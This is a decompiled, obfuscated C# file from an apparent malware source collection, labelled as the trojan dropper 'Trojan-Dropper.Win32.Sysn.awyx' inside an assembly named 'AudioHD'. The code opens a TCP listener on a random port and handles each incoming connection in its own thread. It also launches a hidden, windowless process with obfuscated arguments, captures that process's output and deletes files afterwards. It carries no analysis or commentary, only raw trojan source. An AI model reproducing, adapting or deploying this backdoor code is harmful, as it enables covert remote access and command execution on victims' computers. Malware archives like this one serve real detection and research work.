MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_000F/_0003.cs

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe

using \u0001;
using \u0008;
using \u000F;
using System;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;

namespace \u000F
{
  internal sealed class \u0003
  {
    [NonSerialized]
    internal static \u0002 \u0001;
    private static int \u0001;
    private static string \u0001;
    private static \u000E.\u0008 \u0001;

    public static void \u000F()
    {
      try
      {
        \u0003.\u0001 = new Random().Next(1000, 9999);
        if (!\u0003.\u000F())
          return;
        TcpListener tcpListener = new TcpListener(\u0003.\u0001);
        tcpListener.Start();
        \u0003.\u0001.\u000F(\u0003.\u0001);
        while (true)
          new Thread(new ThreadStart(new \u0007(tcpListener.AcceptTcpClient()).\u000F)).Start();
      }
      catch (Exception ex)
      {
        \u0003.\u0001.\u0010(ex.ToString());
      }
    }

    private static bool \u000F()
    {
      try
      {
        string str = \u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
        if (str.Contains(\u0003.\u0001(8096)))
        {
          \u0003.\u000F(\u0003.\u0001(8082) + \u0003.\u0001 + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(1426) + \u0003.\u0001.ToString() + \u0003.\u0001(8087));
          if (str.Contains(\u0003.\u0001(8096)))
          {
            System.IO.File.Delete(\u0003.\u0001(8113));
            return true;
          }
          System.IO.File.Delete(\u0003.\u0001(8113));
          return false;
        }
        System.IO.File.Delete(\u0003.\u0001(8113));
        return false;
      }
      catch
      {
        System.IO.File.Delete(\u0003.\u0001(8113));
        return false;
      }
    }

    public static string \u000F() => Dns.GetHostByName(Dns.GetHostName()).AddressList[0].ToString();

    public static string \u000F([In] string obj0)
    {
      Process process = new Process();
      process.StartInfo = new ProcessStartInfo()
      {
        WindowStyle = ProcessWindowStyle.Hidden,
        FileName = \u0003.\u0001(8113),
        Arguments = obj0,
        RedirectStandardOutput = true,
        UseShellExecute = false,
        CreateNoWindow = true
      };
      process.Start();
      return process.StandardOutput.ReadToEnd();
    }

    static \u0003()
    {
      \u0003.\u000F();
      \u0003.\u0001 = \u0003.\u000F();
      \u0003.\u0001 = new \u000E.\u0008();
    }
  }
}